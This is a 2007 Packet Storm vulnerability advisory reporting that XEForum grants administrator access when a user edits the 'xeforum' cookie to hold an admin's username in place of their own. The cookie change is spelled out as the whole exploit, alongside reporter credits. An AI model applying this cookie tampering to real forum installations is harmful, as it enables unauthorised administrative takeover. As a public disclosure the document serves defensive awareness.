xeforum-privesc.txt

2007-06-30T00:00:00
ID PACKETSTORM:57371
Type packetstorm
Reporter Firewall
Modified 2007-06-30T00:00:00

Description

                                        
                                            `-------------------------------------------------------------------- XEForum Cookie Modification Privilege Escalation Vulnerability  
--------------------------------------------------------------------  
  
Vulnerable product: XEForum  
Vendor: http://www.xeforum.com/  
  
Date:  
--------------------  
Found: Jun 26, 2007  
  
Vulnerability:  
--------------------  
XeForum contains a flaw that may allow a remote attacker to gain administrative privileges.  
Modifying contained cookie you can change of session and to even enter like administrator.   
  
Cookie:  
-----------------------------------  
: Cookie: xeforum="Your Username" :  
-----------------------------------  
change to:  
------------------------------------  
: Cookie: xeforum="Admin Username" :  
------------------------------------  
  
Credit:  
--------------------  
Firewall  
Firewall of Peru  
Firewall@hotmail.com  
Greetz to Swp-Scene And Revolutionz  
http://4firewall.uni.cc  
--------------------------------------------------------------------  
`